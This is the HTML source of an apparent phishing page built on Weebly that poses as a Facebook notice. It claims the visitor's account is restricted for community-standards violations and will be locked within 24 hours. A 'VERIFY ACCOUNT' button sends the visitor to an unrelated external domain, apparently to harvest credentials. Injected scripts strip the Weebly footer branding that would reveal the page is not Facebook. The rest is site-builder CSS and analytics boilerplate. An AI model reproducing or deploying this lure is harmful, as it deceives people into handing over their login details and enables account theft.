<html lang="en">
  <script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/content/location/location.js" id="eppiocemhmnlbhjplcgkofciiegomcon"></script>
  <script async="" src="//cdn2.editmysite.com/js/wsnbn/snowday262.js"></script>
  <script type="text/javascript" async="" src="https://ssl.google-analytics.com/ga.js"></script>
  <script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/extend-native-history-api.js"></script>
  <script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/requests.js"></script>

  <head>
    <title>Facebook</title>
    <meta property="og:site_name" content="">
    <meta property="og:title" content="Facebook">
    <meta property="og:description" content="">
    <meta property="og:image" content="./files/theme/k97pj8-or6s.png">
    <meta property="og:image" content="./files/theme/header.png">
    <meta property="og:image" content="./files/theme/Locked.png">
    <meta property="og:url" content="/index.html">



    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta property="icon" content="./files/theme/favicon.ico">
    <link rel="icon" href="./files/theme/favicon.ico">


    <link id="wsite-base-style" rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/sites.css">
    <link rel="stylesheet" type="text/css" href="./css/old/fancybox.css">
    <link rel="stylesheet" type="text/css" href="./css/social-icons.css" media="screen,projection">
    <link rel="stylesheet" type="text/css" href="./files/main_style.css" title="wsite-theme-css">

    <link href="./fonts/Open_Sans/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Patua_One/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Raleway/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Patua_One/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Montserrat/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Patua_One/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Open_Sans/font.css?2" rel="stylesheet" type="text/css">
    <link href="./fonts/Droid_Sans/font.css?2" rel="stylesheet" type="text/css">
    <style type="text/css">
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
      #wsite-content div.paragraph,
      #wsite-content p,
      #wsite-content .product-block .product-title,
      #wsite-content .product-description,
      #wsite-content .wsite-form-field label,
      #wsite-content .wsite-form-field label,
      .blog-sidebar div.paragraph,
      .blog-sidebar p,
      .blog-sidebar .wsite-form-field label,
      .blog-sidebar .wsite-form-field label {
        font-family: "Open Sans" !important;
        font-weight: 400 !important;
        letter-spacing: 0px !important;
      }

      #wsite-content div.paragraph,
      #wsite-content p,
      #wsite-content .product-block .product-title,
      #wsite-content .product-description,
      #wsite-content .wsite-form-field label,
      #wsite-content .wsite-form-field label,
      .blog-sidebar div.paragraph,
      .blog-sidebar p,
      .blog-sidebar .wsite-form-field label,
      .blog-sidebar .wsite-form-field label {}

      .wsite-elements.wsite-footer div.paragraph,
      .wsite-elements.wsite-footer p,
      .wsite-elements.wsite-footer .product-block .product-title,
      .wsite-elements.wsite-footer .product-description,
      .wsite-elements.wsite-footer .wsite-form-field label,
      .wsite-elements.wsite-footer .wsite-form-field label {
        letter-spacing: 1px !important;
      }

      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title,
      .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title,
      #wsite-content h2,
      #wsite-content .product-long .product-title,
      #wsite-content .product-large .product-title,
      #wsite-content .product-small .product-title,
      .blog-sidebar h2 {
        font-family: "Patua One" !important;
        text-transform: uppercase !important;
        letter-spacing: 2px !important;
      }

      #wsite-content h2,
      #wsite-content .product-long .product-title,
      #wsite-content .product-large .product-title,
      #wsite-content .product-small .product-title,
      .blog-sidebar h2 {
        color: #080a0c !important;
      }

      .wsite-elements.wsite-footer h2,
      .wsite-elements.wsite-footer .product-long .product-title,
      .wsite-elements.wsite-footer .product-large .product-title,
      .wsite-elements.wsite-footer .product-small .product-title {
        font-family: "Raleway" !important;
        font-weight: 700 !important;
        text-transform: uppercase !important;
        letter-spacing: 2px !important;
      }

      #wsite-title {
        font-family: "Patua One" !important;
        text-transform: uppercase !important;
        letter-spacing: 2px !important;
      }

      .wsite-menu-default a {
        font-family: "Montserrat" !important;
        font-weight: 400 !important;
        letter-spacing: 2px !important;
      }

      .wsite-menu a {}

      .wsite-image div,
      .wsite-caption {}

      .galleryCaptionInnerText {}

      .fancybox-title {}

      .wslide-caption-text {}

      .wsite-phone {}

      .wsite-headline,
      .wsite-header-section .wsite-content-title {
        font-family: "Patua One" !important;
        letter-spacing: 5px !important;
      }

      .wsite-headline-paragraph,
      .wsite-header-section .paragraph {
        font-family: "Open Sans" !important;
      }

      .wsite-button-inner {
        font-family: "Droid Sans" !important;
        letter-spacing: 1px !important;
      }

      .wsite-not-footer blockquote {}

      .wsite-footer blockquote {}

      .blog-header h2 a {}

      #wsite-content h2.wsite-product-title {}

      .wsite-product .wsite-product-price a {}

      .wsite-button-small .wsite-button-inner {
        font-size: 12px !important;
      }

      @media screen and (min-width: 767px) {

        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
        #wsite-content div.paragraph,
        #wsite-content p,
        #wsite-content .product-block .product-title,
        #wsite-content .product-description,
        #wsite-content .wsite-form-field label,
        #wsite-content .wsite-form-field label,
        .blog-sidebar div.paragraph,
        .blog-sidebar p,
        .blog-sidebar .wsite-form-field label,
        .blog-sidebar .wsite-form-field label {
          font-size: 17px !important;
          line-height: 33px !important;
        }

        #wsite-content div.paragraph,
        #wsite-content p,
        #wsite-content .product-block .product-title,
        #wsite-content .product-description,
        #wsite-content .wsite-form-field label,
        #wsite-content .wsite-form-field label,
        .blog-sidebar div.paragraph,
        .blog-sidebar p,
        .blog-sidebar .wsite-form-field label,
        .blog-sidebar .wsite-form-field label {}

        .wsite-elements.wsite-footer div.paragraph,
        .wsite-elements.wsite-footer p,
        .wsite-elements.wsite-footer .product-block .product-title,
        .wsite-elements.wsite-footer .product-description,
        .wsite-elements.wsite-footer .wsite-form-field label,
        .wsite-elements.wsite-footer .wsite-form-field label {}

        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title,
        .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title,
        #wsite-content h2,
        #wsite-content .product-long .product-title,
        #wsite-content .product-large .product-title,
        #wsite-content .product-small .product-title,
        .blog-sidebar h2 {
          font-size: 35px !important;
          line-height: 44px !important;
        }

        #wsite-content h2,
        #wsite-content .product-long .product-title,
        #wsite-content .product-large .product-title,
        #wsite-content .product-small .product-title,
        .blog-sidebar h2 {}

        .wsite-elements.wsite-footer h2,
        .wsite-elements.wsite-footer .product-long .product-title,
        .wsite-elements.wsite-footer .product-large .product-title,
        .wsite-elements.wsite-footer .product-small .product-title {}

        #wsite-title {
          font-size: 26px !important;
        }

        .wsite-menu-default a {
          font-size: 13px !important;
        }

        .wsite-menu a {}

        .wsite-image div,
        .wsite-caption {}

        .galleryCaptionInnerText {}

        .fancybox-title {}

        .wslide-caption-text {}

        .wsite-phone {}

        .wsite-headline,
        .wsite-header-section .wsite-content-title {
          font-size: 55px !important;
        }

        .wsite-headline-paragraph,
        .wsite-header-section .paragraph {}

        .wsite-button-inner {}

        .wsite-not-footer blockquote {}

        .wsite-footer blockquote {}

        .blog-header h2 a {}

        #wsite-content h2.wsite-product-title {}

        .wsite-product .wsite-product-price a {}
      }

    </style>
    <style>
      .wsite-background {
        background-image: url("/uploads/1/4/9/4/149472366/background-images/1404200096.jpeg") !important;
        background-repeat: no-repeat !important;
        background-position: 25.00% 17.21% !important;
        background-size: 100% !important;
        background-color: transparent !important;
      }

      body.wsite-background {
        background-attachment: fixed !important;
      }

      .wsite-background.wsite-custom-background {
        background-size: cover !important
      }

    </style>
    <script src="/files/templateArtifacts.js?1715528760"></script>
    <script bis_use="true" type="text/javascript" charset="utf-8" data-bis-config="[&quot;facebook.com/&quot;,&quot;twitter.com/&quot;,&quot;youtube-nocookie.com/embed/&quot;,&quot;//vk.com/&quot;,&quot;//www.vk.com/&quot;,&quot;//linkedin.com/&quot;,&quot;//www.linkedin.com/&quot;,&quot;//instagram.com/&quot;,&quot;//www.instagram.com/&quot;,&quot;//www.google.com/recaptcha/api2/&quot;,&quot;//hangouts.google.com/webchat/&quot;,&quot;//www.google.com/calendar/&quot;,&quot;//www.google.com/maps/embed&quot;,&quot;spotify.com/&quot;,&quot;soundcloud.com/&quot;,&quot;//player.vimeo.com/&quot;,&quot;//disqus.com/&quot;,&quot;//tgwidget.com/&quot;,&quot;//js.driftt.com/&quot;,&quot;friends2follow.com&quot;,&quot;/widget&quot;,&quot;login&quot;,&quot;//video.bigmir.net/&quot;,&quot;blogger.com&quot;,&quot;//smartlock.google.com/&quot;,&quot;//keep.google.com/&quot;,&quot;/web.tolstoycomments.com/&quot;,&quot;moz-extension://&quot;,&quot;chrome-extension://&quot;,&quot;/auth/&quot;,&quot;//analytics.google.com/&quot;,&quot;adclarity.com&quot;,&quot;paddle.com/checkout&quot;,&quot;hcaptcha.com&quot;,&quot;recaptcha.net&quot;,&quot;2captcha.com&quot;,&quot;accounts.google.com&quot;,&quot;www.google.com/shopping/customerreviews&quot;,&quot;buy.tinypass.com&quot;,&quot;gstatic.com&quot;,&quot;secureir.ebaystatic.com&quot;,&quot;docs.google.com&quot;,&quot;contacts.google.com&quot;,&quot;github.com&quot;,&quot;mail.google.com&quot;,&quot;chat.google.com&quot;,&quot;audio.xpleer.com&quot;,&quot;keepa.com&quot;,&quot;static.xx.fbcdn.net&quot;,&quot;sas.selleramp.com&quot;,&quot;1plus1.video&quot;,&quot;console.googletagservices.com&quot;]" src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/../executers/vi-tr.js"></script>
    <script>
      var STATIC_BASE = '//cdn1.editmysite.com/';
      var ASSETS_BASE = '//cdn2.editmysite.com/';
      var STYLE_PREFIX = 'wsite';

    </script>
    <script src="https://cdn2.editmysite.com/js/jquery-1.8.3.min.js"></script>

    <script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1715364408&amp;"></script>
    <script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1715364408"></script>
    <script type="text/javascript">
      function initCustomerAccountsModels() {
        (function() {
          _W.setup_rpc({
            "url": "\/ajax\/api\/JsonRPC\/CustomerAccounts\/",
            "actions": {
              "CustomerAccounts": [{
                "name": "login",
                "len": 2,
                "multiple": false,
                "standalone": false
              }, {
                "name": "logout",
                "len": 0,
                "multiple": false,
                "standalone": false
              }, {
                "name": "getSessionDetails",
                "len": 0,
                "multiple": false,
                "standalone": false
              }, {
                "name": "getAccountDetails",
                "len": 0,
                "multiple": false,
                "standalone": false
              }, {
                "name": "getOrders",
                "len": 0,
                "multiple": false,
                "standalone": false
              }, {
                "name": "register",
                "len": 4,
                "multiple": false,
                "standalone": false
              }, {
                "name": "emailExists",
                "len": 1,
                "multiple": false,
                "standalone": false
              }, {
                "name": "passwordReset",
                "len": 1,
                "multiple": false,
                "standalone": false
              }, {
                "name": "passwordUpdate",
                "len": 3,
                "multiple": false,
                "standalone": false
              }, {
                "name": "validateSession",
                "len": 1,
                "multiple": false,
                "standalone": false
              }]
            },
            "namespace": "_W.CustomerAccounts.RPC"
          });
          _W.setup_model_rpc({
            "rpc_namespace": "_W.CustomerAccounts.RPC",
            "model_namespace": "_W.CustomerAccounts.BackboneModelData",
            "collection_namespace": "_W.CustomerAccounts.BackboneCollectionData",
            "bootstrap_namespace": "_W.CustomerAccounts.BackboneBootstrap",
            "models": {
              "CustomerAccounts": {
                "_class": "CustomerAccounts.Model.CustomerAccounts",
                "defaults": null,
                "validation": null,
                "types": null,
                "idAttribute": null,
                "keydefs": null
              }
            },
            "collections": {
              "CustomerAccounts": {
                "_class": "CustomerAccounts.Collection.CustomerAccounts"
              }
            },
            "bootstrap": []
          });
        })();
      }
      if (document.createEvent && document.addEventListener) {
        var initEvt = document.createEvent('Event');
        initEvt.initEvent('customerAccountsModelsInitialized', true, false);
        document.dispatchEvent(initEvt);
      } else if (document.documentElement.initCustomerAccountsModels === 0) {
        document.documentElement.initCustomerAccountsModels++
      }

    </script>
    <script type="text/javascript">
      _W = _W || {};
      _W.securePrefix = 'meta-facebookplatformshelp.weebly.com';

    </script>
    <script>
      _W = _W || {};
      _W.customerLocale = "en_US";
      _W.storeName = null;
      _W.isCheckoutReskin = false;
      _W.storeCountry = "US";
      _W.storeCurrency = "USD";
      _W.storeEuPrivacyPolicyUrl = "";
      com_currentSite = "777998666214540147";
      com_userID = "149472366";

    </script>
    <script type="text/javascript">
      _W.configDomain = "www.weebly.com";

    </script>
    <script>
      _W.relinquish && _W.relinquish()

    </script>
    <script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1715364408&amp;"></script>
    <script>
      _W.themePlugins = [];

    </script>
    <script type="text/javascript">
      _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js";

    </script>



    <style type="text/css">
      .customer-accounts-app__body[data-v-7ef42737] {
        width: 100%
      }

      .customer-accounts-app__modal-wrapper[data-v-7ef42737] {
        position: fixed;
        top: 0;
        left: 0;
        width: 100vw;
        height: 100vh;
        z-index: 17;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        background: rgba(0, 0, 0, .25)
      }

      .customer-accounts-app__modal[data-v-7ef42737] {
        width: 580px;
        box-sizing: border-box;
        max-height: 100%;
        min-height: 415px;
        overflow-y: auto;
        z-index: 18;
        padding: 24px;
        background: #fff;
        display: flex
      }

      .wsite-theme-dark .customer-accounts-app__modal-wrapper[data-v-7ef42737] {
        background: hsla(0, 0%, 100%, .25)
      }

      .wsite-theme-dark .customer-accounts-app__modal[data-v-7ef42737] {
        background: #000
      }

      @media (max-width:750px) {
        .customer-accounts-app__modal[data-v-7ef42737] {
          width: 100%;
          height: 100%
        }
      }

    </style>
    <style type="text/css">
      .loading[data-v-db79aa1c] {
        display: flex;
        width: 100%;
        align-items: center;
        justify-content: center;
        margin: 15px 0
      }

    </style>
    <style type="text/css">
      .page-header__wrapper[data-v-ed59fae0] {
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: space-between
      }

      .page-header__text[data-v-ed59fae0] {
        margin: 0 32px 0 0
      }

      .page-header__divider[data-v-ed59fae0] {
        height: 1px;
        width: 100%;
        margin: 24px 0;
        background: rgba(0, 0, 0, .1)
      }

    </style>
    <style type="text/css">
      .form-field[data-v-2b04d498] {
        margin: 16px 0
      }

      .form-field__label[data-v-2b04d498] {
        display: flex;
        flex-direction: column
      }

      .form-field__title[data-v-2b04d498] {
        margin-bottom: 8px;
        font-size: 90%;
        color: #3b526d
      }

      .wsite-theme-dark .form-field__title[data-v-2b04d498] {
        color: #dfe6ee
      }

      .form-field__error[data-v-2b04d498] {
        margin-top: 14px
      }

    </style>
    <style type="text/css">
      .field-error[data-v-338d8d38] {
        color: #ff2825
      }

    </style>
    <style type="text/css">
      .form-instructions[data-v-8ddff154] {
        margin-bottom: 24px
      }

    </style>
    <style type="text/css">
      .site-input[data-v-4c05aa90] {
        border: 1px solid #dbdbdb;
        padding: 8px;
        border-radius: 2px
      }

      .site-input__is-invalid[data-v-4c05aa90] {
        border: 1px solid #ff2825
      }

    </style>
    <style type="text/css">
      .actions-row[data-v-136b380e] {
        margin-top: 24px;
        display: flex;
        flex-direction: row;
        justify-content: space-between;
        align-items: center
      }

      .actions-row div[data-v-136b380e]:first-child {
        margin-right: 16px
      }

    </style>
    <style type="text/css">
      .back-button[data-v-fe280eac] {
        display: flex;
        flex-direction: row;
        align-items: center
      }

      .back-button__icon[data-v-fe280eac] {
        margin: 0 8px 0 0
      }

    </style>
    <style type="text/css">
      p[data-v-6cc325c4] {
        font-weight: 700
      }

      .order-confirmation__checkbox[data-v-6cc325c4] {
        margin-right: 6px
      }

      .order-confirmation__success-message[data-v-6cc325c4] {
        display: flex;
        flex-direction: row;
        align-items: center
      }

    </style>
    <style type="text/css">
      .register__privacy-policy[data-v-0761b96f] {
        margin: 24px 0;
        font-size: small
      }

    </style>
    <style type="text/css">
      .customer-accounts-app__body[data-v-55d84bd4] {
        width: 100%
      }

      .customer-accounts-app__modal-wrapper[data-v-55d84bd4] {
        position: fixed;
        top: 0;
        left: 0;
        width: 100vw;
        height: 100vh;
        z-index: 17;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        background: rgba(0, 0, 0, .25)
      }

      .customer-accounts-app__modal[data-v-55d84bd4] {
        width: 580px;
        box-sizing: border-box;
        max-height: 100%;
        min-height: 415px;
        overflow-y: auto;
        z-index: 18;
        padding: 24px;
        background: #fff;
        display: flex
      }

      .wsite-theme-dark .customer-accounts-app__modal-wrapper[data-v-55d84bd4] {
        background: hsla(0, 0%, 100%, .25)
      }

      .wsite-theme-dark .customer-accounts-app__modal[data-v-55d84bd4] {
        background: #000
      }

      @media (max-width:600px) {
        .customer-accounts-app__modal[data-v-55d84bd4] {
          width: 100%;
          height: 100%
        }
      }

    </style>
    <style type="text/css">
      .account-details__wrapper[data-v-398277ef] {
        width: 100%
      }

      .account-details__group[data-v-398277ef] {
        margin-bottom: 24px;
        text-align: left
      }

      .account-details__table-container[data-v-398277ef] {
        overflow: auto
      }

      .account-details__title[data-v-398277ef] {
        text-align: left;
        margin-bottom: 6px
      }

      .account-details__log-out[data-v-398277ef] {
        cursor: pointer
      }

      .account-details__error[data-v-398277ef] {
        margin: 36px 0;
        text-align: left
      }

      .error[data-v-398277ef] {
        color: #ff2825
      }

    </style>
    <style type="text/css">
      .section-header__wrapper[data-v-30a09418] {
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: space-between
      }

      .section-header__text[data-v-30a09418] {
        margin: 24px 0
      }

    </style>
    <style type="text/css">
      .empty-content-area__container[data-v-d17db2d0] {
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        margin-bottom: 32px;
        width: 100%;
        min-height: 80px;
        background: #f2f2f2
      }

      .wsite-theme-dark .empty-content-area__container[data-v-d17db2d0] {
        background: #000
      }

    </style>
    <style type="text/css">
      .order-details__table[data-v-4601454e] {
        width: 100%;
        margin-top: 12px;
        margin-bottom: 36px;
        empty-cells: show;
        border-collapse: collapse;
        border-spacing: 0;
        border: none
      }

      .order-details__table th[data-v-4601454e] {
        margin: 0;
        padding: 16px;
        text-align: left;
        background: #f2f2f2
      }

      .wsite-theme-dark .order-details__table th[data-v-4601454e] {
        background: #000
      }

      .order-details__table td[data-v-4601454e] {
        margin: 0;
        padding: 16px;
        text-align: left
      }

    </style>
    <style type="text/css">
      .shipping-address__wrapper[data-v-0b54f770] {
        text-align: left;
        width: 100%
      }

    </style>
    <style type="text/css">
      .reset-password__link[data-v-4f820709] {
        cursor: pointer
      }

    </style>
    <link href="//cdn2.editmysite.com/css/free-footer-v3.css?buildtime=1716037962" rel="stylesheet">
  </head>

  <body tabindex="0" class="b c d e f  wsite-theme-light  wsite-page-roadblock" style="background-color: rgb(236, 239, 245); min-height: 100%; position: relative; height: auto !important; padding-bottom: 62px !important;" bis_register="W3sibWFzdGVyIjp0cnVlLCJleHRlbnNpb25JZCI6ImVwcGlvY2VtaG1ubGJoanBsY2drb2ZjaWllZ29tY29uIiwiYWRibG9ja2VyU3RhdHVzIjp7IkRJU1BMQVkiOiJkaXNhYmxlZCIsIkZBQ0VCT09LIjoiZGlzYWJsZWQiLCJUV0lUVEVSIjoiZGlzYWJsZWQiLCJSRURESVQiOiJkaXNhYmxlZCIsIlBJTlRFUkVTVCI6ImRpc2FibGVkIiwiSU5TVEFHUkFNIjoiZGlzYWJsZWQiLCJDT05GSUciOiJkaXNhYmxlZCJ9LCJ2ZXJzaW9uIjoiMi4wLjE0Iiwic2NvcmUiOjIwMDE0fV0=">
    <div class="g" bis_skin_checked="1">
      <div id="viewport" bis_skin_checked="1">
        <div class="h i" id="header" bis_skin_checked="1">
          <img src="./files/theme/k97pj8-or6s.png" class="j k" style="width: 77px;height: auto;"></div>
        <div id="objects_container" bis_skin_checked="1">
          <div id="root" role="main" bis_skin_checked="1">
            <table class="l" role="presentation">
              <tbody>
                <tr>
                  <td class="m">
                    <div class="n o p" style="display: none;" id="login_error" bis_skin_checked="1">
                      <div class="q" bis_skin_checked="1"></div>
                    </div>
                    <div class="r" bis_skin_checked="1">
                      <div class="s t" bis_skin_checked="1">
                        <div id="login_top_banner" bis_skin_checked="1"></div>
                        <div class="u" bis_skin_checked="1">
                          <ul class="x y z">
                            <li class="y">
                              <center><img src="./files/theme/header.png" width="70%" style="margin: 0.5rem;">
                                <br>
                                <h4 class="font-weight-bold" style="font-weight: 700 !important;font-size: 18px;margin-bottom: 0.5rem;line-height: 1.2;">Your account has been restricted</h4>
                                <p _ngcontent-xnw-c32="" class="mx-3" style="margin-left: 1rem !important;margin-right: 1rem !important;font-size: 13px;margin-top: 0;margin-bottom: 1rem;line-height: 1.6;">Someone reported your account, and unfortunately your account violated our community standards.
                                </p>
                              </center>
                            </li>


                            <li class="y">
                              <div style="justify-content: space-between;display: flex;" bis_skin_checked="1">
                                <img ngcontent-xnw-c32="" src="./files/theme/Locked.png" width="40px" height="40px" alt="" style="margin-left: 1.5rem !important;">
                                <p style="margin-left: 1rem !important;margin-right: 1rem !important;font-size: 13px;margin-top: 0;margin-bottom: 1rem;line-height: 1.6;"><b>Account will be lock after 24 hours if you not verify</b><br>
                                  To continue using, please click the account verification button below and follow the instructions</p>
                              </div>
                            </li><br>
                            <li class="y">
                              <a href="http://menyalaabangku.work.gd/" class="bh bi bj bk bl bm" style="font-size: 12px;font-weight: 800;">VERIFY ACCOUNT</a>
                            </li>
                          </ul>
                        </div>
                      </div>
                    </div>
                  </td>
                </tr>
              </tbody>
            </table>
          </div>
        </div>
        <div bis_skin_checked="1"></div>
      </div>
    </div>
    <div class="block" style="display:none" bis_skin_checked="1"><span style="visibility:hidden">&nbsp;</span></div>
    <div class="block" style="display:none" bis_skin_checked="1">

    </div>
    <div class="block" style="display:none" bis_skin_checked="1">
      <div id="wsite-content" class="wsite-elements wsite-not-footer" bis_skin_checked="1">

      </div>
    </div>
    <div class="block" style="padding: 0px; width:0%; text-align:center;" bis_skin_checked="1">

      <style type="text/css">
        @font-face {
          font-family: SQMarket-Medium;
          font-style: normal;
          font-weight: 500;
          src:
            url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
            url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff") format("woff");
        }

      </style>



      <script type="text/javascript" src="//cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1716037962"></script>
      <script type="text/javascript">
        if (document.readystate === 'complete') {
          Weebly.footer.setupContainer('cdn2.editmysite.com', '1716037962');
        } else {
          document.addEventListener('DOMContentLoaded', function() {
            Weebly.footer.setupContainer('cdn2.editmysite.com', '1716037962');
          });
        }

      </script>
    </div>
    <div id="customer-accounts-app" bis_skin_checked="1"></div>
    <script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1715364408"></script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("weebly-footer-signup-container");
        element.parentNode.removeChild(element);
      }, false);

    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("kb-container");
        element.parentNode.removeChild(element);
      }, false);

    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("weebly-footer-signup-container-v3");
        element.parentNode.removeChild(element);
      }, false);

    </script>
    <script type="text/javascript">
      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-7870337-1']);
      _gaq.push(['_setDomainName', 'none']);
      _gaq.push(['_setAllowLinker', true]);

      (function() {
        var ga = document.createElement('script');
        ga.type = 'text/javascript';
        ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        // NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
        var s = document.getElementsByTagName('script')[1];
        s.parentNode.insertBefore(ga, s);
      })();

      _W.Analytics = _W.Analytics || {
        'trackers': {}
      };
      _W.Analytics.trackers.wGA = '_gaq';

    </script>

    <script type="text/javascript" async="1">
      // NOTE: keep the getElementsByTagName(o)**[1]** if you replace this code. Otherwise cookie banner scripts won't be first on the page
      ;
      (function(p, l, o, w, i, n, g) {
        if (!p[i]) {
          p.GlobalSnowplowNamespace = p.GlobalSnowplowNamespace || [];
          p.GlobalSnowplowNamespace.push(i);
          p[i] = function() {
            (p[i].q = p[i].q || []).push(arguments)
          };
          p[i].q = p[i].q || [];
          n = l.createElement(o);
          g = l.getElementsByTagName(o)[1];
          n.async = 1;
          n.src = w;
          g.parentNode.insertBefore(n, g)
        }
      }(window, document, 'script', '//cdn2.editmysite.com/js/wsnbn/snowday262.js', 'snowday'));

      var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
      var snPlObR = function(arr) {
        var s = '';
        for (var i = 0; i < arr.length; i++) {
          s = s + String.fromCharCode(arr[i]);
        }
        return s;
      };
      var s = snPlObR(r);

      var regEx = new RegExp(s);

      _W.Analytics = _W.Analytics || {
        'trackers': {}
      };
      _W.Analytics.trackers.wSP = 'snowday';
      _W.Analytics.user_id = '149472366';
      _W.Analytics.site_id = '777998666214540147';

      var drSegmentsTag = document.getElementById('drSegments');
      if (drSegmentsTag) {
        _W.Analytics.spContexts = _W.Analytics.spContexts || [];

        var segmentData = JSON.parse(drSegmentsTag.innerText);
        segmentData.forEach(function(test) {
          _W.Analytics.spContexts.push({
            schema: "iglu:com.weebly/context_ab_segment/jsonschema/1-0-0",
            data: {
              test_id: test.name,
              segment: test.variant,
            }
          });
        });
      }


      (function(app_id, ec_hostname, discover_root_domain) {
        var track = window[_W.Analytics.trackers.wSP];
        if (!track) return;
        track('newTracker', app_id, ec_hostname, {
          appId: app_id,
          post: true,
          platform: 'web',
          discoverRootDomain: discover_root_domain,
          cookieName: '_snow_',
          contexts: {
            webPage: true,
            performanceTiming: true,
            gaCookies: true
          },
          crossDomainLinker: function(linkElement) {
            return regEx.test(linkElement.href);
          },
          respectDoNotTrack: true
        });
        track('trackPageView', _W.Analytics.user_id + ':' + _W.Analytics.site_id, _W.Analytics.spContexts);
        track('crossDomainLinker', function(linkElement) {
          return regEx.test(linkElement.href);
        });
      })(
        '_wn',
        'ec.editmysite.com',
        false
      );

    </script>





    <script>
      (function(jQuery) {
        try {
          if (jQuery) {
            jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
            var $commentFrame = jQuery('#commentArea iframe');
            if ($commentFrame.length > 0) {
              var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
              $commentFrame.css('min-height', frameHeight + 'px');
            }
            if (jQuery('.product-button').length > 0) {
              jQuery(document).ready(function() {
                jQuery('.product-button').parent().each(function(index, product) {
                  if (jQuery(product).attr('target') == 'paypal') {
                    if (!jQuery(product).find('> [name="bn"]').length) {
                      jQuery('<input>').attr({
                        type: 'hidden',
                        name: 'bn',
                        value: 'DragAndDropBuil_SP_EC'
                      }).appendTo(product);
                    }
                  }
                });
              });
            }
          } else {
            // Prototype
            $$('div.blog-social div.fb-like').each(function(div) {
              div.className = 'blog-social-item blog-fb-like';
            });
            $$('#commentArea iframe').each(function(iframe) {
              iframe.style.minHeight = '410px';
            });
          }
        } catch (ex) {}
      })(window._W && _W.jQuery);

    </script>

    <script>
      window._W.isEUUser = false;
      window._W.showCookieToAll = "";

    </script>

    <script>
      (function(jQuery) {
        try {
          function forceShowCcLinks() {
            var ccLinks = document.querySelector('.cc_links');
            if (!ccLinks) {
              return;
            }

            var ccLinksVisible = jQuery(ccLinks).is(':visible');
            if (ccLinksVisible) {
              return;
            }


            ccLinks.style.display = 'block';

            var ccParent = ccLinks.parentElement;

            var ccParentVisible = jQuery(ccParent).is(':visible');
            if (ccParentVisible) {
              return;
            }

            ccParent.style.display = 'block';

            var ccGrandparent = ccParent.parentElement;
            var ccGrandparentVisible = jQuery(ccGrandparent).is(':visible');
            if (ccGrandparentVisible) {
              return;
            }
            ccGrandparent.style.display = 'block';

          }

          function forceShowCcLinksForever() {
            var tenSeconds = 10000;
            forceShowCcLinks();
            setTimeout(forceShowCcLinksForever, tenSeconds);
          }

          jQuery(document).ready(forceShowCcLinksForever);
        } catch (ex) {}
      })(window._W && _W.jQuery);

    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("weebly-footer-signup-container");
        element.parentNode.removeChild(element);
      }, false);

    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("kb-container");
